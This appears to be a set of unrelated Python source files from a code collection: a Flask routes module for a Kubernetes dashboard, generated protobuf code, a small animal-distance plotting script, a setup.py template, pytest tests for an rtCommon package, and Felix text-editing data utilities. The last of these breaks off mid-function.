from app.base.k8sclient import (cluster_name_configured,
state_namespaces,
state_nodes,
state_pods,
web_terminal)
from flask import jsonify, redirect, render_template, request, url_for
# , session
# from flask_login import (current_user,
# login_required,
# login_user,
# logout_user)
from google.cloud import firestore
from pystol.lister import list_actions, show_actions
KUBEINIT_VERSION = kubeinit_ui_version.__version__
#
# Begin authentication
#
try:
from app.auth.routes import get_session_data
# from app.auth.util import remote_cluster
except ImportError:
print("Module not available")
try:
fdb = firestore.Client()
transaction = fdb.transaction()
except Exception as e:
print("Cant connect to firestore: %s" % (e))
#
# End authentication
#
@blueprint.route('/error-<error>')
def route_errors(error):
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return render_template('errors/{}.html'.format(error))
# API endpoints
@blueprint.route('/api/v1/ListActions', methods=['GET'])
def api_list_actions():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(list_actions())
@blueprint.route('/api/v1/ShowActions', methods=['GET'])
def api_show_actions():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(show_actions())
@blueprint.route('/api/v1/StateNamespaces', methods=['GET'])
def api_state_namespaces():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_namespaces())
@blueprint.route('/api/v1/StateNodes', methods=['GET'])
def api_state_nodes():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_nodes())
@blueprint.route('/api/v1/StatePods', methods=['GET'])
def api_state_pods():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(state_pods())
@blueprint.route('/api/v1/Terminal', methods=['GET'])
def api_web_terminal():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(web_terminal())
@blueprint.route('/api/v1/ClusterName', methods=['GET'])
def api_cluster_name_configured():
"""
Define a route.
This is a main routing method
"""
#
# Basic authentication module requirement
# If the auth module is installed and the user is not authenticated, so go to login
#
session = {}
if hasattr(app, 'auth'):
try:
session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))
except Exception as e:
print(e)
return redirect(url_for('auth_blueprint.login'))
else:
session['kubeconfig'] = None
# not current_user.is_authenticated:
if hasattr(app, 'auth') and session['email'] is None:
return redirect(url_for('auth_blueprint.login'))
#
# End basic authentication requirement
#
return jsonify(cluster_name_configured())
@blueprint.route('/shutdown')
def shutdown():
"""
Define a route.
This is a main routing method
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
return 'Server shutting down...'
@blueprint.errorhandler(404)
def not_found_error(error):
"""
Define a route.
This is a main routing method
"""
return render_template('page-404.html',
template_folder="../home/templates/"), 404
@blueprint.errorhandler(404)
def internal_error(error):
"""
Define a route.
This is a main routing method
"""
return render_template('page-500.html',
template_folder="../home/templates/"), 500
# Errors
# @login_manager.unauthorized_handler
# def unauthorized_handler():
# """
# Define a route.
#
# This is a main routing method
# """
# return render_template('page-403.html',
# template_folder="../home/templates/"), 403
# @blueprint.errorhandler(403)
# def access_forbidden(error):
# """
# Define a route.
#
# This is a main routing method
# """
# return render_template('page-403.html',
# template_folder="../home/templates/"), 403
|
py | 1a304b8753c7704f6723bc771a077928405b2e89 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: communicator_objects/brain_type_proto.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
#from communicator_objects import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2
import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='communicator_objects/brain_type_proto.proto',
package='communicator_objects',
syntax='proto3',
serialized_pb=_b('\n+communicator_objects/brain_type_proto.proto\x12\x14\x63ommunicator_objects\x1a+communicator_objects/resolution_proto.proto*G\n\x0e\x42rainTypeProto\x12\n\n\x06Player\x10\x00\x12\r\n\tHeuristic\x10\x01\x12\x0c\n\x08\x45xternal\x10\x02\x12\x0c\n\x08Internal\x10\x03\x42\x1f\xaa\x02\x1cMLAgents.CommunicatorObjectsb\x06proto3')
,
dependencies=[communicator__objects_dot_resolution__proto__pb2.DESCRIPTOR,])
_BRAINTYPEPROTO = _descriptor.EnumDescriptor(
name='BrainTypeProto',
full_name='communicator_objects.BrainTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Player', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Heuristic', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='External', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Internal', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=114,
serialized_end=185,
)
_sym_db.RegisterEnumDescriptor(_BRAINTYPEPROTO)
BrainTypeProto = enum_type_wrapper.EnumTypeWrapper(_BRAINTYPEPROTO)
Player = 0
Heuristic = 1
External = 2
Internal = 3
DESCRIPTOR.enum_types_by_name['BrainTypeProto'] = _BRAINTYPEPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\252\002\034MLAgents.CommunicatorObjects'))
# @@protoc_insertion_point(module_scope)
|
py | 1a304bb060903a5cd94b0ffd2af2c9cfbca5e79b | import pylab
class Animal:
def __init__(self, name, egg_laying, scales, poisonous, cold_blood, legs, reptile):
self.name = name
self.egg_laying = egg_laying
self.scales = scales
self.poisonous = poisonous
self.legs = legs
self.cold_blood = cold_blood
self.reptile = reptile
def get_name(self):
return self.name
def distance(self, another_animal):
distance = 0
if self.egg_laying != another_animal.egg_laying:
distance += 1
if self.scales != another_animal.scales:
distance += 1
if self.poisonous != another_animal.poisonous:
distance += 1
if self.legs != another_animal.legs:
distance += 1
if self.cold_blood != another_animal.cold_blood:
distance += 1
if self.reptile != another_animal.reptile:
distance += 1
return distance
def __str__(self):
return self.name
def std_dev(l):
if len(l) == 0:
return float('NaN')
summ = 0
for i in l:
summ += len(i)
mean = summ / float(len(l))
tot = 0.0
for i in l:
tot += (len(i) - mean) ** 2
std = (tot / len(l)) ** 0.5
return std
def z_scale_features(vals):
result = pylab.array(vals)
mean = float(sum(vals)) / len(vals)
result = result - mean
return result / std_dev(result)
def i_scale_features(vals):
min_vals, max_vals = min(vals), max(vals)
fit = pylab.polyfit([min_vals, max_vals], [0, 1], 1)
return pylab.polyval(fit, vals)
animals = [Animal('cobra', 1, 1, 1, 1, 0, 1),
Animal('rattlesnake', 1, 1, 1, 1, 0, 1),
Animal('boa constrictor', 0, 1, 0, 1, 0, 1),
Animal('chicken', 1, 1, 0, 1, 2, 0),
Animal('guppy', 0, 1, 0, 0, 0, 0),
Animal('dart frog', 1, 0, 1, 0, 4, 0),
Animal('zebra', 0, 0, 0, 0, 4, 0),
Animal('python', 1, 1, 0, 1, 0, 1),
Animal('alligator', 1, 1, 0, 1, 4, 1)]
def distance_matrix(animals, precision):
column_label = []
for a in animals:
column_label.append(a.get_name())
row_label = column_label[:]
table_vals = []
# Get distance between pairs of animals
for a1 in animals:
row = []
for a2 in animals:
if a1 == a2:
row.append('--')
else:
distance = a1.distance(a2)
row.append(str(round(distance, precision)))
table_vals.append(row)
table = pylab.table(rowLabels=row_label,
colLabels=column_label,
cellText=table_vals,
cellLoc='center',
loc='center',
colWidths=[0.138] * len(animals))
table.scale(1, 2.5)
pylab.axis('off')
pylab.savefig('distance')
distance_matrix(animals, 3)
|
py | 1a304c94f9d33523058aa89133e995522e180368 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pipenv install twine --dev
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'mypackage'
DESCRIPTION = 'My short description for my project.'
URL = 'https://github.com/me/myproject'
EMAIL = '[email protected]'
AUTHOR = 'Awesome Soul'
REQUIRES_PYTHON = '>=3.8.0'
VERSION = '0.1.0'
# What packages are required for this module to be executed?
REQUIRED = [
# 'requests', 'maya', 'records',
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
project_slug = NAME.lower().replace("-", "_").replace(" ", "_")
with open(os.path.join(here, project_slug, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=["tests", "*.tests", "*.tests.*", "tests.*"]),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
|
py | 1a304d958c1bf8226f9dfa8a1c718239de92b0d2 | class ResampleQuality:
r"""Quality levels for resampling."""
QUICK = 'q'
LOW = 'l'
MEDIUM = 'm'
HIGH = 'h'
VERY_HIGH = 'v'
|
py | 1a304d961a3e03a6460d3f21abd9d9ba9cbc8ecf | #!/usr/bin/env python3
import pytest # type: ignore
import os
import time
import random
import pathlib
import numpy as np # type: ignore
import numpy
from glob import iglob
from pathlib import Path
import rtCommon.utils as utils # type: ignore
import rtCommon.projectUtils as putils # type: ignore
import rtCommon.validationUtils as vutils # type: ignore
from rtCommon.structDict import MatlabStructDict # type: ignore
from rtCommon.addLogin import addUserPassword
from rtCommon.webHttpHandlers import loadPasswdFile
@pytest.fixture(scope="module")
def matTestFilename(): # type: ignore
return os.path.join(os.path.dirname(__file__), 'test_input/teststruct.mat')
class TestFindNewestFile:
TEST_BASE_FILENAME = '/tmp/testdir/file1_20170101T01010'
NUM_TEST_FILES = 5
def setup_class(cls):
# create tmp directory if it doesn't exist
pathlib.Path('/tmp/testdir/').mkdir(parents=True, exist_ok=True)
# check if test files already exist, get the count of them
count_testfiles = sum(1 for _ in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*"))
if count_testfiles != TestFindNewestFile.NUM_TEST_FILES:
# remove any existing testfiles
for filename in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*"):
os.remove(filename)
# create the correct number of test files
for i in range(TestFindNewestFile.NUM_TEST_FILES):
filename = TestFindNewestFile.TEST_BASE_FILENAME + str(i)
with open(filename, 'w') as fp:
fp.write("test file")
time.sleep(1)
def assert_result_matches_filename(self, filename):
assert filename == (self.TEST_BASE_FILENAME + str(self.NUM_TEST_FILES - 1))
def test_normalCase(self):
print("Test findNewestFile normal case:")
filename = utils.findNewestFile('/tmp/testdir', 'file1_20170101*')
self.assert_result_matches_filename(filename)
def test_emptyPath(self):
print("Test findNewestFile empty path:")
filename = utils.findNewestFile('', '/tmp/testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_pathInPattern(self):
print("Test findNewestFile path embedded in pattern:")
filename = utils.findNewestFile(
'/tmp/testdir', '/tmp/testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_pathPartiallyInPattern(self):
print("Test findNewestFile path partially in pattern:")
filename = utils.findNewestFile('/tmp', 'testdir/file1_20170101*')
self.assert_result_matches_filename(filename)
def test_noMatchingFiles(self):
print("Test findNewestFile no matching files:")
filename = utils.findNewestFile('/tmp/testdir/', 'no_such_file')
assert filename is None
class TestCompareArrays:
A = None
B = None
max_deviation = .01
def setup_class(cls):
arrayDims = [40, 50, 60]
A = np.random.random(arrayDims)
delta = np.random.random(arrayDims) * TestCompareArrays.max_deviation
B = A + (A * delta)
TestCompareArrays.A = A
TestCompareArrays.B = B
def test_compareArrays(self):
print("Test compareArrays")
# import pdb; pdb.set_trace()
result = vutils.compareArrays(self.B, self.A)
assert result['mean'] < 2 / 3 * self.max_deviation
assert result['max'] < self.max_deviation
return
def test_areArraysClose(self):
print("Test areArraysClose")
max_mean = 2 / 3 * self.max_deviation
assert vutils.areArraysClose(self.B, self.A, mean_limit=max_mean)
return
class TestCompareMatStructs:
A = None
B = None
max_deviation = .01
def setup_class(cls):
def delta(val):
return val + (val * random.random() * TestCompareMatStructs.max_deviation)
A = MatlabStructDict(
{'sub': MatlabStructDict({})}, 'sub')
A.str1 = "hello"
A.a1 = 6.0
A.sub.a2 = np.array([1, 2, 3, 4, 5], dtype=np.float)
A.sub.b2 = 7.0
A.sub.str2 = "world"
B = MatlabStructDict(
{'sub': MatlabStructDict({})}, 'sub')
B.str1 = "hello"
B.a1 = delta(A.a1)
B.sub.a2 = delta(A.a2)
B.sub.b2 = delta(A.b2)
B.sub.str2 = "world"
TestCompareMatStructs.A = A
TestCompareMatStructs.B = B
def test_compareMatStructs_all_fields(self):
print("Test compareMatStructs_all_fields")
result = vutils.compareMatStructs(self.A, self.B)
means = [result[key]['mean'] for key in result.keys()]
assert len(means) == 5
assert all(mean < self.max_deviation for mean in means)
def test_compareMatStructs_field_subset(self):
print("Test compareMatStructs_field_subset")
result = vutils.compareMatStructs(self.A, self.B, ['a2', 'str1'])
means = [result[key]['mean'] for key in result.keys()]
assert len(means) == 2
assert all(mean < self.max_deviation for mean in means)
def test_isMeanWithinThreshold(self):
a = {'val1': {'mean': .1, 'max': .2},
'val2': {'mean': .05, 'max': .075}}
assert vutils.isMeanWithinThreshold(a, .11)
assert not vutils.isMeanWithinThreshold(a, .09)
class TestValidationUtils:
def test_compareMatFiles(self, matTestFilename):
res = vutils.compareMatFiles(matTestFilename, matTestFilename)
assert vutils.isMeanWithinThreshold(res, 0)
def test_pearsonsMeanCorr(self):
n1 = np.array([[1, 2, 3, 4, 5],
[np.nan, np.nan, np.nan, np.nan, np.nan]])
n2 = np.array([[1.1, 2.1, 3.2, 4.1, 5.05],
[np.nan, np.nan, np.nan, np.nan, np.nan]])
n1t = np.transpose(n1)
n2t = np.transpose(n2)
res = vutils.pearsons_mean_corr(n1t, n2t)
assert res > 0.999
class TestUtils:
def test_delete(self):
fileList = ['/tmp/testdir/d1/test1.txt', '/tmp/testdir/d1/d2/test2.txt',
'/tmp/testdir/d1/d2/d3/test3.txt', '/tmp/testdir/d1/d2/d3/test4.txt']
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
# test delete files from list
assert os.path.exists(fileList[-1])
utils.deleteFilesFromList(fileList)
assert not os.path.exists(fileList[-1])
assert os.path.isdir('/tmp/testdir/d1/d2/d3')
# test delete folder
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
utils.deleteFolder('/tmp/testdir/d1')
assert not os.path.isdir('/tmp/testdir/d1')
# test delete files recursively in folders, but leave folders in place
for file in fileList:
utils.writeFile(file, 'hello', binary=False)
utils.deleteFolderFiles('/tmp/testdir/d1')
assert os.path.isdir('/tmp/testdir/d1/d2/d3')
class TestAddUser:
def test_adduser(self):
testPasswordFile = '/tmp/testdir/test_pwd_file'
# start with empty file
if os.path.exists(testPasswordFile):
os.remove(testPasswordFile)
addUserPassword('a_user', 'a_password', testPasswordFile, retypePasswd=False)
addUserPassword('b_user', 'b_password', testPasswordFile, retypePasswd=False)
pwds = loadPasswdFile(testPasswordFile)
assert 'a_user' in pwds
assert 'b_user' in pwds
class TestProjectUtils:
def test_npToPy(self):
data1 = {'subject': '04', 'task': 'story', 'suffix': 'bold', 'datatype': 'func', 'run': 1}
data2 = {'a1': (1, 'two', 3.0),
'a2': {'np': numpy.float32(3), 'pyint': 4, 'str': 'five'},
'a3': [6.0, 'seven', numpy.int(8), {'a', numpy.float32(5), 'c'}]}
data2_py = {'a1': (1, 'two', 3.0),
'a2': {'np': 3.0, 'pyint': 4, 'str': 'five'},
'a3': [6.0, 'seven', 8.0, {'a', 5.0, 'c'}]}
kwargs = {'mdata': data2, 'test1': 9.0, 'test2': numpy.float32(9), 'test3': 'yes'}
kwargs_py = {'mdata': data2_py, 'test1': 9.0, 'test2': 9.0, 'test3': 'yes'}
args = (4, 'hello', data1, kwargs)
args_py = (4, 'hello', data1, kwargs_py)
res = putils.npToPy(args)
assert res == args_py
if __name__ == "__main__":
print("PYTEST MAIN:")
pytest.main()
|
py | 1a304e1024ad069dcf72a7729caa76ee2217ce61 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for Felix."""
import json
from typing import Callable, Iterator, Mapping, MutableSequence, NamedTuple, Optional, Sequence, Tuple, Union
from absl import logging
from six import with_metaclass
import tensorflow as tf
import felix_constants as constants
import tokenization
FeedDict = Mapping[str, Sequence[Sequence[float]]]
SourceTargetPair = Tuple[MutableSequence[str], str]
def get_token_list(text):
"""Returns a list of tokens.
This function expects that the tokens in the text are separated by space
character(s). Example: "ca n't , touch". This is the case at least for the
public DiscoFuse and WikiSplit datasets.
Args:
text: String to be split into tokens.
"""
return text.split()
def build_feed_dict(tokens,
tokenizer,
target_tokens = None,
max_seq_length = 128,
max_predictions_per_seq = 20):
"""Returns a dictionary used for predicting/training the insertion model.
Converts a list of source tokens, containing masks, to a dictionary of
features used by a TF model. If a target sequence is provided, then the
targets for the MASKs are set.
Args:
tokens: Input tokens, with mask tokens.
tokenizer: Tokenizer used to convert tokens to IDs.
target_tokens: (Optional) The targets of the mask tokens.
max_seq_length: Maximum sequence length.
max_predictions_per_seq: Maximum number of mask tokens.
Returns:
Dictionary with model features or None if `len(tokens) > max_seq_length` or
if the number of MASKs is larger than `max_predictions_per_seq`.
"""
mask_position = []
mask_target_id = []
mask_target_weight = []
for idx, token in enumerate(tokens):
if token != constants.MASK:
continue
mask_position.append(idx)
if target_tokens:
mask_target_id += tokenizer.convert_tokens_to_ids([target_tokens[idx]])
else:
mask_target_id.append(0)
mask_target_weight.append(1.0)
# Deleted tokens (bracketed by unused) should have a segment_id of 2.
unused = False
segment_ids = []
for token in tokens:
if token == constants.DELETE_SPAN_START or unused:
unused = True
segment_ids.append(2)
else:
segment_ids.append(0)
if token == constants.DELETE_SPAN_END:
unused = False
input_mask = [1] * len(tokens)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
assert len(segment_ids) == len(input_ids)
# Padding.
while len(input_ids) < max_seq_length:
segment_ids.append(0)
input_ids.append(0)
input_mask.append(0)
if len(input_ids) > max_seq_length:
input_ids = input_ids[:max_seq_length]
segment_ids = segment_ids[:max_seq_length]
input_mask = input_mask[:max_seq_length]
#return None
assert len(input_ids) == max_seq_length, "len(input_ids) = {}".format(
len(input_ids))
assert len(input_mask) == max_seq_length, "len(input_mask) = {}".format(
len(input_mask))
assert len(segment_ids) == max_seq_length, "len(segment_ids) = {}".format(
len(segment_ids))
if len(mask_position) > max_predictions_per_seq:
mask_position = mask_position[:max_predictions_per_seq]
#return None
while len(mask_position) < max_predictions_per_seq:
mask_target_weight.append(0)
mask_position.append(0)
mask_target_id.append(0)
feed_dict = {
"input_ids": [input_ids],
"input_mask": [input_mask],
"segment_ids": [segment_ids],
"masked_lm_positions": [mask_position],
"masked_lm_ids": [mask_target_id],
"masked_lm_weights": [mask_target_weight],
}
return feed_dict
def _int_feature(values):
return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(values):
return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _text_feature(values):
return tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[element.encode("utf8") for element in values]))
def feed_dict_to_tf_example(feed_dict,
source = None,
target = None):
"""Returns a TF example for MLM insertion model."""
features = {
"input_ids": _int_feature(feed_dict["input_ids"][0]),
"input_mask": _int_feature(feed_dict["input_mask"][0]),
"segment_ids": _int_feature(feed_dict["segment_ids"][0]),
"masked_lm_positions": _int_feature(feed_dict["masked_lm_positions"][0]),
"masked_lm_ids": _int_feature(feed_dict["masked_lm_ids"][0]),
"masked_lm_weights": _float_feature(feed_dict["masked_lm_weights"][0]),
}
if source:
features["text_source"] = _text_feature([source])
if target:
features["text_target"] = _text_feature([target])
return tf.train.Example(features=tf.train.Features(feature=features))
class Features(NamedTuple):
"""A data holder for various features that can be read from files."""
source: MutableSequence[str]
target: str
output_variant_id: Optional[int] = None
@staticmethod
def from_source_target_pair(pair):
return Features(source=pair[0], target=pair[1])
SourcesAndFeaturesPair = Tuple[MutableSequence[str], Features]
def text_file_iterator(fname_pattern):
"""Returns an iterator over lines of the files covered by fname_pattern."""
for fname in get_filenames(fname_pattern):
with tf.io.gfile.GFile(fname, "r") as f:
for line in f:
yield line
def skip_header_text_file_iterator(fname_pattern):
"""Similar to text_file_iterator, but skipping the first line of each file."""
for fname in get_filenames(fname_pattern):
tf.io.gfile.GFile(fname)
it = tf.io.gfile.GFile(fname, "r")
it.next() # skip the header line
for line in it:
yield line
def get_parse_tsv_line_fn(
return_none_on_error = False,
reverse = False):
"""A higher-order function producing TSV line-parsing functions.
Args:
return_none_on_error: Whether to return None on encountering an error (such
as too few TSV columns) rather than raising an Error.
reverse: When True, returns ([`target`], `source`) instead of ([`source`],
`target`). Useful for working with "reverse" (a.k.a. "noise" models that
go from `target` to `source`.
Returns:
A parsing function that goes from a text line to a ([source], target) pair
(or a ([`target`], `source`) pair when `reverse`=True).
"""
def parse_tsv_line(line):
"""Parses the first two columns, `source` and `target`, from a TSV line.
Any further columns are ignored.
Args:
line: A text line.
Returns:
a tuple ([source], target), with `source` being wrapped in a list.
Raises:
ValueError: when the line has less than two TSV columns and
`return_none_on_error`=False.
"""
split = line.rstrip("\n").split("\t")
if len(split) < 2:
message = 'TSV line has less than two tab-delimited fields:\n"{}"'.format(
line)
if return_none_on_error:
logging.warning(message)
return None
else:
raise ValueError(message)
source, target = split[:2]
if reverse:
return [target], source
else:
return [source], target
return parse_tsv_line
def parse_discofuse_line(line):
"""Parses a DiscoFuse example from a line from a TSV file.
The documentation for this format:
https://github.com/google-research-datasets/discofuse#data-format
Args:
line: A line from a TSV file.
Returns:
A pair (<source texts list>, <target text>).
"""
coherent_1, coherent_2, incoherent_1, incoherent_2, _, _, _, _ = (
line.rstrip("\n").split("\t"))
# Strip because the second coherent sentence might be empty.
fusion = (coherent_1 + " " + coherent_2).strip()
return [incoherent_1, incoherent_2], fusion
def parse_iterate_plain_line(line):
return _parse_iterate_line(line, with_intent=False)
def parse_iterate_intent_line(line):
return _parse_iterate_line(line, with_intent=True)
def _parse_iterate_line(line, with_intent=False):
"""Parses a IteraTE example from a line from a (line-by-line) JSON file.
Args:
line: A JSON line from a line-by-line JSON file.
Returns:
A tuple ([source], target), with `source` being wrapped in a list.
"""
json_line = json.loads(line)
if with_intent:
src = json_line["before_sent_with_intent"]
else:
src = json_line["before_sent"]
tgt = json_line["after_sent"]
return [src], tgt
def yield_sources_and_targets(
input_file_pattern,
input_format,
source_key = None,
target_key = None):
"""Produces an iterator over pairs (source list, targets) parsed from a file.
Args:
input_file_pattern: Path/pattern to the input file(s).
input_format: Format of the input file.
source_key: Source text feature name. Only considered when
`input_format=sstable`.
target_key: Target text feature name. Only considered when
`input_format=sstable`.
Yields:
Pairs of (list of source texts, target text).
"""
data_spec = {
"wikisplit": (text_file_iterator, get_parse_tsv_line_fn()),
"discofuse": (skip_header_text_file_iterator, parse_discofuse_line),
"IteraTE_Plain": (skip_header_text_file_iterator, parse_iterate_plain_line),
"IteraTE_Intent": (skip_header_text_file_iterator, parse_iterate_intent_line),
}
if input_format not in data_spec:
raise ValueError("Unsupported input_format: {}".format(input_format))
file_iterator_fn, parse_fn = data_spec[input_format]
for item in file_iterator_fn(input_file_pattern):
# Pytype correctly infers possible types for `item`, but does not handle
# well the various possible signatures of `parse_fn`.
parsed_item = parse_fn(item) # pytype: disable=wrong-arg-types
if parsed_item is not None:
yield parsed_item
def get_filenames(patterns):
"""Obtains a list of filenames corresponding to the pattern.
Supports patterns, as well as plain
file names, as well as comma-separated lists of patterns.
Caveat: Will not work if the patterns have commas (',') in them.
Args:
patterns: File pattern or comma-separated patterns.
Raises:
RuntimeError: If `patterns` is valid but cannot be expanded/does not match
any files.
Returns:
list of individual paths to each file.
"""
all_files = []
for pattern in patterns.split(","):
# points to a specific file.
files = tf.io.gfile.glob(pattern)
if not files:
raise RuntimeError("Could not find files matching: %s" % pattern)
all_files.extend(files)
return all_files
def read_label_map(
path,
use_str_keys = False):
"""Returns label map read from the given path.
Args:
path: Path to the label map file.
use_str_keys: Whether to use label strings as keys instead of
(base tag, num insertions) tuple keys. The latter is only used by
FelixInsert.
"""
label_map = {}
with tf.io.gfile.GFile(path) as f:
if path.endswith(".json"):
label_map = json.load(f)
else:
for tag in f:
tag = tag.strip()
# Empty lines are skipped.
if tag:
if tag in label_map:
raise ValueError("Duplicate label in label_map: {}".format(tag))
label_map[tag] = len(label_map)
if not use_str_keys:
new_label_map = {}
for key, val in label_map.items():
